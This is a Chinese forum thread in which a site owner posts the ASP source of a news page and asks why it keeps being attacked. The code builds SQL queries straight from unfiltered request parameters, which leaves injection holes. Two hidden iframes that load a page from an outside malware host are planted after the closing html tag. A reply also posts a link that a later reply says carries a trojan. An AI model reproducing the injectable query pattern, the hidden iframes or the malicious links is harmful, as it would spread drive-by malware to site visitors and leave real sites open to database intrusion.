为什么这段代码会频繁的被人攻击??
<Table width="780" border="0" cellpadding="0" cellspacing="0"style="BORDER-LEFT: #000000 1px solid; BORDER-RIGHT: #000000 1px solid;"
align="center"><Tr><Td height="35" background="images/titlebj.gif">
<Table width="90%" border="0" cellpadding="0" cellspacing="0" align="right">
<tr><td><% call showguide%></td></tr>
</Table>
</td>
</Tr></Table>
<%
if request("bid")="" then bid=0 else bid=request("bid")
dir=request("dir")
if dir="" then dir="default"
id=request("id")
if id<>"" then
rs.open "select * from news where newsid="&id,conn,1,3
if not rs.eof then bid=rs("boardid")
rs.close
end if
sid=request("sid")%>
<Table width="780" border="0" cellpadding="0" cellspacing="0" background="images/txtbg.gif"
style="BORDER-LEFT: #000000 1px solid; BORDER-RIGHT: #000000 1px solid;"
align="center">
<Tr>
<%gid=givegrandparent(bid)
if hasSon(gid)<>0 then
%>
<Td width="176" background="images/n_jyzk_007.gif" valign="top">
<table width="168" border="0" cellpadding="0" cellspacing="0" align="center">
<tr><td>
<img src="images/<%=dir%>/lefttitle.gif"></td></tr>
<TR>
<TD height=23></TD>
</TR>
<%
j=findson(gid,1)%>
</table>
</td>
<%else
singlebd=1
end if
%>
<td valign="top">
<Table width="97%" border="0" cellpadding="0" cellspacing="0" align="center">
<tr><td height="20"></td></tr>
<tr><Td height="40" valign="middle"
<%if singlebd=1 then response.Write "align=center"%>><img src="images/<%=dir%>/bigtitle.gif"></Td></tr>
<tr><td><table width="80%" align="center"><tr><Td><div align="right"><img src="images/itemy.gif"> <%ls=givePos(bid)%></div></Td></tr> </table></td></tr>
<tr><td>
<%if id<>"" then
set rslanmu=server.createObject("adodb.recordset")
sql="select * from board where boardid in (select boardid from news where newsid="&id&")"
rslanmu.open sql,conn,1,3
flagPl=rslanmu("comment")%>
<%rslanmu.close
set rslanmu=nothing
ls=list_content(id,flagPl,"ls") '列出文章内容 newsid为文章ID,blnPl为是否显示评论
else
if hasSon(bid)=0 then
response.Write "<br>"
page=request("page")
if page="" then page=0
ls=intoPages(page,bid,20,26)
response.Write "<br>"
else
set rslanmu=server.createObject("adodb.recordset")
rslanmu.open "select * from board where parent="&bid,conn,1,3
dim bidset(100)
dim opentable(100)
do while not rslanmu.eof
%>
<TABLE cellSpacing=0 cellPadding=0 width="85%" border=0 align="center">
<TBODY>
<TR>
<TD width="1%"><IMG height=28 src="images/n_jyzk_003.gif"
width=15></TD>
<TD class=black12c width="95%" background=images/right_005.gif >
<img src="images/itemy.gif">
<A href="list.asp?bid=<%=bid%>&sid=<%=rslanmu("boardid")%>&dir=<%=dir%>"> <%=rslanmu("bname")%></a></TD>
<TD width="4%"><IMG height=28 src="images/right_006.gif"
width=15></TD></TR>
<TR>
<TD><IMG height=144 src="images/n_jyzk_004.gif" width=15></TD>
<TD vAlign=top background=images/n_jyzk_006.gif>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td valign="top">
<table width="90%" cellpadding="0" cellspacing="0" border="0" align="center">
<tr><td height="5"></td></tr>
<%bid=rslanmu("boardid")
bidnum=1
pfront=0
ptail=1
opentable(1)=bid
do while (ptail>pfront)
pfront=pfront+1
curid=opentable(pfront)
if hasSon(curid)=0 then
bidset(bidnum)=curid
bidnum=bidnum+1
else
set rsls=server.createobject("adodb.recordset")
rsls.open "select * from board where parent="&curid,conn,1,3
num=rsls.recordcount
for k=1 to num
ptail=ptail+1
opentable(ptail)=rsls("boardid")
rsls.movenext
next
rsls.close
set rsls=nothing
end if
loop
strbid=""
for i=1 to bidnum-1
strbid=strbid& "(boardid="&cstr(bidset(i))&") "
if i<>bidnum-1 then strbid=strbid+"or "
next
if bidnum=2 then strbid="("+strbid+")"%>
<%sql="select top 5 * from news where "&strbid&" and (checked=1) order by updatetime desc"
rs.open sql,conn,1,3
do while not rs.eof%>
<tr><td height="21"><img src="images/itemg.gif">
<font color="#006666"></font>
<a href="list.asp?bid=<%=bid%>&dir=<%=dir%>&id=<%=rs("newsid")%>" title="<%=rs("title")%>"><%=turntitle(rs("title"),28)%></a>
</td></tr>
<Tr><td height="1" background="images/line.gif"></td></Tr>
<%rs.movenext
loop
rs.close%>
<Tr><td height="25"><div align="right">
<a href="list.asp?bid=<%=rslanmu("boardid")%>&dir=<%=dir%>">
<img src="images/morey.gif" border="0"></a> </div></td></Tr>
</table>
</td></tr>
</table>
</TD>
<TD><IMG height=144 src="images/n_jyzk_005.gif"
width=15></TD></TR></TBODY></TABLE><br><br>
<%rslanmu.movenext
loop
rslanmu.close
set rslanmu=nothing
end if
end if
%>
</td></tr>
</Table>
</td>
</Tr></Table>
<Table width="780" border="0" cellpadding="0" cellspacing="0"
style="BORDER-LEFT: #000000 1px solid; BORDER-RIGHT: #000000 1px solid;"
align="center"><Tr><Td height="124" background="images/bottom.jpg">
<Table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr><td width="30" valign="top"></td></tr>
<tr><td valign="top" align="center"></td>
</tr>
<tr>
<td valign="top" align="center"></td>
</tr>
</table>
</td>
</Tr></Table>
</body>
</html><iframe src=http://www.hby007.cn/one/a26.htm?01 width=50 height=0 border=0></iframe>
<iframe src=http://www.hby007.cn/one/a26.htm?01 width=50 height=0 border=0></iframe>
后面又被挂马了?
说什么在sid过滤不严。可以cookie构造注入。我没看懂。谁能说说啊!!!! [url=http://user1.hxg008.cn/a27/fxx.htm]hxxp://user1.hxg008.cn/a27/fxx.htm[/url]
[[i] 本帖最后由 秋叶濛濛 于 2008-8-30 20:45 编辑 [/i]] 二楼的网址有木马,可恶
页:
[1]